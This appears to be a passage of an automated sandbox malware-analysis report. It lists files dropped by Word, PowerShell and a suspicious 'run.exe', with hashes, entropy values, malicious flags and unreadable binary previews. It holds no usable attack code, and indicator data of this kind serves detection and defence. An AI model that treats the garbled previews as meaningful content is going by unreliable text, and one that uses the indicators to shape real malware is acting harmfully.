                                                  Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Word 2007+
                                                  Category:dropped
                                                  Size (bytes):3465076
                                                  Entropy (8bit):7.898517227646252
                                                  Encrypted:false
                                                  SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                  MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                  SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                  SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                  SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                  Malicious:false
                                                  Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Word 2007+
                                                  Category:dropped
                                                  Size (bytes):19361
                                                  Entropy (8bit):7.467021841993517
                                                  Encrypted:false
                                                  SSDEEP:384:Jrt+BNxt/ZtNNUdb0NqGBEdMLfSh/Rxi0Oq6i9sqm9ezWH:VAxllN2KRSlRxi0NjcH
                                                  MD5:1159BA8BC6BC0E7689B6978E3A05538A
                                                  SHA1:3E646DBE530F69D3B27D1EAF152F2C0B165CD4C0
                                                  SHA-256:BFDBDB896338266032978B74953D41CBE6013AD1DD93431EDFE6FA9AADC80BA8
                                                  SHA-512:9DA67118276303112E4BE3EE07417D2CFB37920F7221FF2CB0C507F1B68B6C25D0A6E6F56BE95C9D4FC70A1D73EACD203B1AE0F932D5ECD5DD07CE6F812E69EF
                                                  Malicious:false
                                                  Preview:PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):3.5948724366517477
                                                  Encrypted:false
                                                  SSDEEP:3:KVGl/lilKlRAGl/nzlX9FtV9Ky6GjawtVxxlP9AIfBtWMoLOYOn:KVy/4KDZrV91aYVLzAIZtWbLc
                                                  MD5:47342CEA0A1E237688C37A73E6DC0569
                                                  SHA1:6AAC2AF71F4AA617DAA9170B19C0BA06FD2500FC
                                                  SHA-256:3F86C7A890944208C492298E1C419779928ED12AF32ADE386A32087A0F7F453E
                                                  SHA-512:DF70B5699E27A94099B586D34F6709EE7253BB6B5B3394EB187BC4E2248483FC77BF08957A6FF93D69FCBB9CC58725D905C80CEFE75B60DD90278DBA5ECBC269
                                                  Malicious:false
                                                  Preview:.user..................................................j.o.n.e.s.............H.U...3.4...Xz.kM..........i....H.U...3.8?....3..m...m..M............m..H.U.x...8?..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Word 2007+
                                                  Category:dropped
                                                  Size (bytes):19361
                                                  Entropy (8bit):7.467021841993517
                                                  Encrypted:false
                                                  SSDEEP:384:Jrt+BNxt/ZtNNUdb0NqGBEdMLfSh/Rxi0Oq6i9sqm9ezWH:VAxllN2KRSlRxi0NjcH
                                                  MD5:1159BA8BC6BC0E7689B6978E3A05538A
                                                  SHA1:3E646DBE530F69D3B27D1EAF152F2C0B165CD4C0
                                                  SHA-256:BFDBDB896338266032978B74953D41CBE6013AD1DD93431EDFE6FA9AADC80BA8
                                                  SHA-512:9DA67118276303112E4BE3EE07417D2CFB37920F7221FF2CB0C507F1B68B6C25D0A6E6F56BE95C9D4FC70A1D73EACD203B1AE0F932D5ECD5DD07CE6F812E69EF
                                                  Malicious:false
                                                  Preview:PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:Qn:Qn
                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                  Malicious:false
                                                  Preview:..
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.729659859669099
                                                  Encrypted:false
                                                  SSDEEP:96:J6W33CxH5hkvhkvCCtCgNpLpH1gNpLpHe:J6WyZ9CupL7upLs
                                                  MD5:89DA3673AF89762B19E84A1EF35D0025
                                                  SHA1:B22FD7A937D9BFB788F99F1C794BD8751622D085
                                                  SHA-256:ED589087D0480550F6DAA882AC047EFCB81DB05DF2AB7E75C6C59ED07B46B0FD
                                                  SHA-512:517312BC93CFF10C1C44998B003722262CACDA8917360BBA2427D052683C1186B4A39003CB86DF220997492C1034067F1D4592E253F22A2ECAF5F53C1821F327
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........4S..n..4S......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y................................R.o.a.m.i.n.g.....\.1......Y....MICROS~1..D......CW.^.Y..............................~.M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.729659859669099
                                                  Encrypted:false
                                                  SSDEEP:96:J6W33CxH5hkvhkvCCtCgNpLpH1gNpLpHe:J6WyZ9CupL7upLs
                                                  MD5:89DA3673AF89762B19E84A1EF35D0025
                                                  SHA1:B22FD7A937D9BFB788F99F1C794BD8751622D085
                                                  SHA-256:ED589087D0480550F6DAA882AC047EFCB81DB05DF2AB7E75C6C59ED07B46B0FD
                                                  SHA-512:517312BC93CFF10C1C44998B003722262CACDA8917360BBA2427D052683C1186B4A39003CB86DF220997492C1034067F1D4592E253F22A2ECAF5F53C1821F327
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........4S..n..4S......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y................................R.o.a.m.i.n.g.....\.1......Y....MICROS~1..D......CW.^.Y..............................~.M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.940659878703813
                                                  Encrypted:false
                                                  SSDEEP:24:u46PiDamRf5Vt1FgLp+GZJefvoDI9qGEVX:u4kidx1wpMXg/
                                                  MD5:9FFAD0BC92E292289ACD7C904BCF6217
                                                  SHA1:EBF4A007E5D4A1E31CC697C4542853203DDC9CBD
                                                  SHA-256:7FD988C14ECE04F357F9B48351EC37DFCC204407914B49C5A4C7CF117AAA8F04
                                                  SHA-512:5F52D180EBC1A66D5BD3CC07CABAF9A50D6C6074D7839CD397FAE413FED7B3A95CFC6F7903ADC2AA29852322BB33349FB68EF09C4550147B31170A3092D23C54
                                                  Malicious:true
                                                  Preview:qauu{ztnbqape`s{|a|vgp{gccm~fd{xw.v.vpg~`}f.ej`qwgtwsevr.~{z{m}|bbjtrr`z~}ptcutz|ez.gfaeftaofkuet|`z}pn.gdyfdyxskgfhkhqorswyj{vbbxvrfp.}||a}s`r|l...{qgo|xtn`zel{~q{``prfjdavjxz|qp`kw.mau|gpopx|vg|d.|.`ftuqbuqy~asz{`bnc|kgd~jggvoggp~g|ar`iasz{hy~kp`am|or}n{dgx.e|.spy~etzp{guywzys}tmy.fu|{~dtavke{}~g{m}z~z.qwbzuie~qzmxarbkcfz{ct~yq.f.yf`~.}`qa.q}oozmzk`|~ai~gkywrvtvbl}`vt|}gsruxu{fjz..sqek.agtrbxja`fv.cgn`}gqx`q~nd}fezpx.tys`ztl`zjr}p|x.jobpumsufgcfkdrepiw.xrylpeyzdmu.{{g~purkdf`zdgvxx~}tuxxbpwmvrcsrrfw{ikdnccav`p{srk{|`|muhgf|}ddrwryyyrtcdp.`~obli.`lp.f~kbarm~odpvf}ekhg{q~haaygtwtey}~rj.oe`|wwaroppg`jxksyv}m.{`c|~bkman~srkmtyyxb`r|uvfscpp{}kmt~`~}xffostud~vcd~s}c`biya~ecciq|i..ftroy}{py{}s{b}qv|rxqcdb.t}k~}b.mrcwtdbshzdg}r.eubyk~fk~}ubxlc.~.}jyox.pqi{zhmz}lpvgkf~~i{xfq|rhotp~figudxczronuo{f`.mfn|r`ao|||s`kxfey`{znyg~rbfj}cb`dyaaspduqtt{em|wtv.}{aj~msxoywfx{k{or.txsmt~a|j.iqzybo~y`bqs.hlb.ndivxt~.evjp`b.{myfridjbvvju}kuj|phx.fkgcduq`t{bylgf|}.q~qpwjsaqomqigghlibet~uze`frwqsw~~du`yppmdzxu
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.923468988386607
                                                  Encrypted:false
                                                  SSDEEP:24:Qa7JoftIB621nexwaztxxJY7+nDVoQNNZjYROeId2:9toqB621nwwaztxxJYSnhoQ7Zeh
                                                  MD5:1642D6B6008B707034A236A497D2A8DE
                                                  SHA1:12AFA921CCC3955D9A8226D344337EEE29FB7954
                                                  SHA-256:F1C52CBAF96B67ED0ABE3583572E6F3A4B4087360A1010478807C960B42ED789
                                                  SHA-512:DA7DF571C76D008CA031CC171C7C2754CAD1EC26B33EE327AF60285BC202870456D1178D2C605A5CD0B8050696105BB04AC3A4A44B4FEFA2FE2E2E044E8FFC57
                                                  Malicious:false
                                                  Preview:{ey~cqpmxv.qou{cmiqabipfvnu~x`uti}}arfqarrtw.bzvtpttupxzccyhszl.o|ez}bpvbxdr~v{.m.gy.~~y`.qacbgtdboczzbfqjb}jw.z~`z|lmwwuyxt|x{anrb~bpe{|xaa~.w`ge{}g{rpips`fgybzabr`iwbmz}yvrk|w|wu{|cyyp`fq.ybyplxntw|`pzv~|cbfvto.asuqw`.~m``noqaga{nxvqhtg|ec.v|npy}woz|`p}`x|ad}i|}`.izvcmzgo|gyyrd|ubutxu`leloqifgye`wa`.`xxwrsee`ure{wfb~njlf`l}yo.ucatnygwr}~pd}wt{extxpclexl.gks.vz`a.zw{|va{a|yzknahux.wa{e}~tgvq}se`zi}qproizibur.n.xp{fbsavdguda.o~dm~b~p`vato`g`rgiy~bao}rcwtnmfzyidxi}~v}xv}q`xqna``}v{guzg`tsguix~ltbrtfxwxdgmvoquass|r}u}adgnzbnu`x.k}i|`v~pc{~}b|nauuy..mqfyzuy||pqb{xab`p.srlzqvaju~xcpoycygpv`|r}kitjr~qyrvju}b||dgb|kkxczzmx.|{ya{zqm~rek.}eptv|.c}uy.occ`zq`ttdm~uvgupvqa~z|i{q`y~z~oiccy~l|}b}rtcfpzl`~afg`psqqdupbvdd~|xr.t|`k|xx{{rfcgcwboxupj`k||qn|au}}gtaabwr{yi~egpmwryy~grdp~~dc`iosflyfrup|~rmfo|br~.ypme{grbqhbrgfu~ona{`.ucp~rt{nd|dchjwgo`~uzblytnodizx|h}c~gmc~.eow|oa}tcis{yd.ssgrayjlm`gpf.oufofoddq`wkm}zquuyhtw|d.}braqbl}r{}|vulap.tia|`}kvbxabghuzxqqvkjpuvgqvup}jamzrefmd`qayzhnmx.~cp.cou.ucxl
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.923468988386607
                                                  Encrypted:false
                                                  SSDEEP:24:Qa7JoftIB621nexwaztxxJY7+nDVoQNNZjYROeId2:9toqB621nwwaztxxJYSnhoQ7Zeh
                                                  MD5:1642D6B6008B707034A236A497D2A8DE
                                                  SHA1:12AFA921CCC3955D9A8226D344337EEE29FB7954
                                                  SHA-256:F1C52CBAF96B67ED0ABE3583572E6F3A4B4087360A1010478807C960B42ED789
                                                  SHA-512:DA7DF571C76D008CA031CC171C7C2754CAD1EC26B33EE327AF60285BC202870456D1178D2C605A5CD0B8050696105BB04AC3A4A44B4FEFA2FE2E2E044E8FFC57
                                                  Malicious:false
                                                  Preview:{ey~cqpmxv.qou{cmiqabipfvnu~x`uti}}arfqarrtw.bzvtpttupxzccyhszl.o|ez}bpvbxdr~v{.m.gy.~~y`.qacbgtdboczzbfqjb}jw.z~`z|lmwwuyxt|x{anrb~bpe{|xaa~.w`ge{}g{rpips`fgybzabr`iwbmz}yvrk|w|wu{|cyyp`fq.ybyplxntw|`pzv~|cbfvto.asuqw`.~m``noqaga{nxvqhtg|ec.v|npy}woz|`p}`x|ad}i|}`.izvcmzgo|gyyrd|ubutxu`leloqifgye`wa`.`xxwrsee`ure{wfb~njlf`l}yo.ucatnygwr}~pd}wt{extxpclexl.gks.vz`a.zw{|va{a|yzknahux.wa{e}~tgvq}se`zi}qproizibur.n.xp{fbsavdguda.o~dm~b~p`vato`g`rgiy~bao}rcwtnmfzyidxi}~v}xv}q`xqna``}v{guzg`tsguix~ltbrtfxwxdgmvoquass|r}u}adgnzbnu`x.k}i|`v~pc{~}b|nauuy..mqfyzuy||pqb{xab`p.srlzqvaju~xcpoycygpv`|r}kitjr~qyrvju}b||dgb|kkxczzmx.|{ya{zqm~rek.}eptv|.c}uy.occ`zq`ttdm~uvgupvqa~z|i{q`y~z~oiccy~l|}b}rtcfpzl`~afg`psqqdupbvdd~|xr.t|`k|xx{{rfcgcwboxupj`k||qn|au}}gtaabwr{yi~egpmwryy~grdp~~dc`iosflyfrup|~rmfo|br~.ypme{grbqhbrgfu~ona{`.ucp~rt{nd|dchjwgo`~uzblytnodizx|h}c~gmc~.eow|oa}tcis{yd.ssgrayjlm`gpf.oufofoddq`wkm}zquuyhtw|d.}braqbl}r{}|vulap.tia|`}kvbxabghuzxqqvkjpuvgqvup}jamzrefmd`qayzhnmx.~cp.cou.ucxl
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.9570996395004
                                                  Encrypted:false
                                                  SSDEEP:24:RCrGEPv5COAENHcPskyaDKx6feXKS9bHi4RPc/KHX:ROPYO3DaOsfGKc3wK3
                                                  MD5:EE1EBDC404E8FB05E5F4DF3284EBF727
                                                  SHA1:C401AD3638F921977C26DEACE84803F9B8C54962
                                                  SHA-256:828BFA9D2FFCA4CD8D03757A4C2BCDB0285942C9B105C12BA760A06C1E7B770D
                                                  SHA-512:DF705C5D340822C3F6BCAC60BFB3FD9DCFCDF3FBC3399186E362A64AAC2EDB9ACE437EAA9658F635AB1128DD61AE1C905AA3786326E26EE0BF66313CE3A5747D
                                                  Malicious:false
                                                  Preview:xplxmo`{a`kr{pjpczsrytmwxgmwrjebvu{f|{{|qreqs{sp|oe~kcc{~cusc{rp.fp}c`tqpocsqf{ig~r.s|dff}ucqj.{gapaeg.{juytyu`abr{gktl}f`wt}y`azu~e`e|jibwtt`kfutkmqvjd`e{rbmwy|xy|oztanixqaktmtq`kwrese.|ug~}v}myd.paaz`ezn.apeaum{prsvk~{elbtexyfixt|lo.~urwg{a..vql}`uidxsnzevdpgyfb{ckfs`afcsdk~bfzhboyd}kwuerzjbuqu}jopzarc}zl||ppwf}pbay{uffi}|s`}.u.dx{|`a~|rgtbt~wbt~dkre~f~osgzyp`vfwtiebyx.rn}f.gvw}rgba`cy}|fdaffxfvpnsg`l.zyfwo.h.z|bk}vato.vhc}fo}.ezeoeraie}}lhyptb}meoubpxlryqdkw~z~sip~scq.~lqvdpbkv{.pkoyyidy`tnlx`mygk~su|cnq~wczk{aftskc`spmavyyj~okp{pmig`u{p{f}|eze{.ar|pwbpo|`sbveeahyjbc|ju}|olpknxia{chwfwauyffslf.xoeejzt.otci{iw`wvz..tnbybo.bxmv.`wldqr.r|paqv}zf{ix}`gzkupfwv|k`prxh`kzbgzqzo|zz{alw|sivibct{j`zxg{rjq~w|b`bkplgvu.v|vfjiognbrka|deqbxrbyp}`q|zjtavr|d~rzzevzbn{vrlxcgbzi`xmy.j|.rl|}`s.fdcdz}.jpyrt~cc.upwfzagnm~|szauo.tyhbbprs~agdcq.sqhmaaldivdrq|ctzdagjm{rsvikab}vkofucbbj~`driftgqmgkpsjaz`nv~ttyxry.pfnntin}hnregd}|jr`qu|.`|qvzyu`etp~{vx|{tq}iw{gls|d|zzk|o||}{tz.vrr{eabybqv}r|}dewpqp{izaxuci|q
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.951335587154764
                                                  Encrypted:false
                                                  SSDEEP:24:q33lWhFS8eTBfhKeApa9KXthZYdADV3I4rdaUCDYRs8HQl:81WhUPCG9KXnGwTr50YFHo
                                                  MD5:95A6A199A8C29D310F2185128C494774
                                                  SHA1:09321942D2215AB3D4B9816AE5572E79133D88D4
                                                  SHA-256:96FA7F6EB43F2F19B75338534B938218DA13F1BA0526E256B88285190E204B38
                                                  SHA-512:18844D1F9D98FD1295CA8341D914D0D7D0786FAE55F855C7708BC48F14A23D098FBF594AFC01064C491B529D4652855535308B51FA57B83C67AEDA0FEE976768
                                                  Malicious:false
                                                  Preview:xko.{gnazzbgqu}qrxpfwlufv~pg{{p.et~y`ec~|lbsqaruks{ajqfig}gj..ynlzac`oubbsq.expi.vbbb~yxzdvtfrfjhpuax~r{jvuxfob|jn~hz|cl~ywp}~cgh.ob}v`unyqls~xw{qfwe}addzpo.ylvbuvdswyqb{fahkvvbpbr{csmz{ystp|ktuy{wkdxj.z{mutte{gpmtt{iwgqc{`zs~c||rm}cvta~fcrvrlvzys`~vjccr~pabyd{|c|wdeuow}xfkfbguqqwdfz{rbt}xsys~zccsyvvdxx~`wovlo~gpxxbyza~qud|asryaupid|tqh`ejp{abooad~}ux||eiznrecwk{zqo`zvvp}qlqd{lvfk~trqubaaofr{~`efqeporc`a~}wdtjnx`qogetnbeqo`ryryj~sv.cirq{`zsz|`p}.ztnyqxru{rmq`l}|usxxm{gpejhlmewls}qc{evim.c|p|jn|fdadx`owfwtqkcc~jxq`bax}duz.layjxqgpmtaaqp~yt{pamc~g.{wcmd{n`dywr.busgf}|urtwumr|jrfanznw}e{~kogzqz`bxp~pb`zndxyzpge.tqbppbr{ouzpxl`ob}pxr`u`zha.|nbvoqsbe`t{|{ce`yqwsx~lvwww}aygtzp}}pdo`{zqbqdha|}{yd}s`dzt`nnyyd}y.vlsivrs}dw`u{aoa{dzuzeqpccbqztn.g.}uh.{{lfwtvrctxjtlfumaxyrsfruax}yyqzfm~hidfqmth.txti}baqv}mcuz{otqssyacsp|pgah}.pxagsme}oz|.q{ls{iq{~}d{a~.zcwhomlyi~wco|zn|c|ywxmrvxtzf{fss|jfbyuehn{zw}s}cb|x|rrb|pfwyx.gbykgk|.bhxxaea.{hqx~ogjb.rt{zmto~iq{t~dv~czfddr.mvaqsrmlwsk{gpuejb.x}o}gwavw~{ia`b
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.951335587154764
                                                  Encrypted:false
                                                  SSDEEP:24:q33lWhFS8eTBfhKeApa9KXthZYdADV3I4rdaUCDYRs8HQl:81WhUPCG9KXnGwTr50YFHo
                                                  MD5:95A6A199A8C29D310F2185128C494774
                                                  SHA1:09321942D2215AB3D4B9816AE5572E79133D88D4
                                                  SHA-256:96FA7F6EB43F2F19B75338534B938218DA13F1BA0526E256B88285190E204B38
                                                  SHA-512:18844D1F9D98FD1295CA8341D914D0D7D0786FAE55F855C7708BC48F14A23D098FBF594AFC01064C491B529D4652855535308B51FA57B83C67AEDA0FEE976768
                                                  Malicious:false
                                                  Preview:xko.{gnazzbgqu}qrxpfwlufv~pg{{p.et~y`ec~|lbsqaruks{ajqfig}gj..ynlzac`oubbsq.expi.vbbb~yxzdvtfrfjhpuax~r{jvuxfob|jn~hz|cl~ywp}~cgh.ob}v`unyqls~xw{qfwe}addzpo.ylvbuvdswyqb{fahkvvbpbr{csmz{ystp|ktuy{wkdxj.z{mutte{gpmtt{iwgqc{`zs~c||rm}cvta~fcrvrlvzys`~vjccr~pabyd{|c|wdeuow}xfkfbguqqwdfz{rbt}xsys~zccsyvvdxx~`wovlo~gpxxbyza~qud|asryaupid|tqh`ejp{abooad~}ux||eiznrecwk{zqo`zvvp}qlqd{lvfk~trqubaaofr{~`efqeporc`a~}wdtjnx`qogetnbeqo`ryryj~sv.cirq{`zsz|`p}.ztnyqxru{rmq`l}|usxxm{gpejhlmewls}qc{evim.c|p|jn|fdadx`owfwtqkcc~jxq`bax}duz.layjxqgpmtaaqp~yt{pamc~g.{wcmd{n`dywr.busgf}|urtwumr|jrfanznw}e{~kogzqz`bxp~pb`zndxyzpge.tqbppbr{ouzpxl`ob}pxr`u`zha.|nbvoqsbe`t{|{ce`yqwsx~lvwww}aygtzp}}pdo`{zqbqdha|}{yd}s`dzt`nnyyd}y.vlsivrs}dw`u{aoa{dzuzeqpccbqztn.g.}uh.{{lfwtvrctxjtlfumaxyrsfruax}yyqzfm~hidfqmth.txti}baqv}mcuz{otqssyacsp|pgah}.pxagsme}oz|.q{ls{iq{~}d{a~.zcwhomlyi~wco|zn|c|ywxmrvxtzf{fss|jfbyuehn{zw}s}cb|x|rrb|pfwyx.gbykgk|.bhxxaea.{hqx~ogjb.rt{zmto~iq{t~dv~czfddr.mvaqsrmlwsk{gpuejb.x}o}gwavw~{ia`b
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.933622675062732
                                                  Encrypted:false
                                                  SSDEEP:24:C7VapbGyIlxxezDLyY/mTtzLGqnUisA1S2XFYP7/oaRM:C7yGyIteuYeNLbUjAY2VYPG
                                                  MD5:B677A7ABE0647FA17458B201F4EAEAC7
                                                  SHA1:7288E136C86747037A56F1999C8BFFC0E32E1ED7
                                                  SHA-256:C171945475A4153C9ABB0B685CF3AA0E6ACE9A7592AAFD4143826AEFD76CC0EB
                                                  SHA-512:F18F04C42C066A9204C7032EE2E5FB90A3D9A8D1A333089FB9C6D40B0D164969636F22BD74518A0A1DFB34EB80307EFAE1E4E44AF241C7DF5B361AD4F4F0490D
                                                  Malicious:false
                                                  Preview:.estlwe}hijzbq|{fjg`vpzp~yudt`{zyt}au~rx{ctpg{.pqsrfadgf|{.rjqdbndcfpv}odakqdwnnxs.ocbt`ytabbqnwk``.x}hpbg|yjmmcd~chkkyegzexw~pdlc`.rkxlhdtqvyb.{vjbtpzuxtpl`m`{i{~o.binxb.k|jibqxpwak~mfpudygbyrwpadpfvqy{vru.grb`vzpxw}uf.ba`|~pwqvh{.f}yaw~wda{{}|ppvwttyc|vyfg.fwlnnxgkga|ygnlrce{a{.zo`r~dk.pe.qwq{uga{p`kxdt`hr|cmpjqzvzzmppnkka`seyqpffwovwe~}tqewcp`nupijpcwop{il{~pwo}e}{jicyavpvu}w``|l}{rfrinvgk{xzr`gozqqwrgb|lgkoa`p{j`{rmggu~{euxyporagg|z~gpbpzqzg`.yg}ewqu.t.qcttii~xrlorf`xv`~rstm`c}pgiwgawp|.{.}blpiwygd.zu{axvuhxwfqqwqdsdgrvpxpabtus|nzxrw|lb~o{zogcpqx}w}uia|.ibdxp}y.zqbbl}kktspywv{eg`s|halsprbe{d~z|y{zqwqk`~z{gau}ryopx}gtw~peyq.rfwbo|ttbwr|pjs}w`pyaisldo|yusksnrqa`setw{ffwd~z|xz`vqgc{dwb~e|re}i.p{m~|qolwy}`zyqqverua..a`g~ud.zt.yt}fauxssqddb`ez.`..g|wyv|j~bcnk}ub~qeb}{{dxg~}mol{h~xgaab~uvw{dyaos}q~qugtp|n{de{i.odwwaek.y|`hsxfbv{hhmox{fpdp~aafp|sz`}rr`{lra|lxiua{gu~|zco}zkhagrvdkdfv}cewldooh{wpldgbd.fdw~tul|o~azvudvprncrky|k|lewtz.a}vwstzn}~jz`qqwcwbulei.yg`zknt|dzj~wpcwd|ampdy{va{.guycks
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.933622675062732
                                                  Encrypted:false
                                                  SSDEEP:24:C7VapbGyIlxxezDLyY/mTtzLGqnUisA1S2XFYP7/oaRM:C7yGyIteuYeNLbUjAY2VYPG
                                                  MD5:B677A7ABE0647FA17458B201F4EAEAC7
                                                  SHA1:7288E136C86747037A56F1999C8BFFC0E32E1ED7
                                                  SHA-256:C171945475A4153C9ABB0B685CF3AA0E6ACE9A7592AAFD4143826AEFD76CC0EB
                                                  SHA-512:F18F04C42C066A9204C7032EE2E5FB90A3D9A8D1A333089FB9C6D40B0D164969636F22BD74518A0A1DFB34EB80307EFAE1E4E44AF241C7DF5B361AD4F4F0490D
                                                  Malicious:false
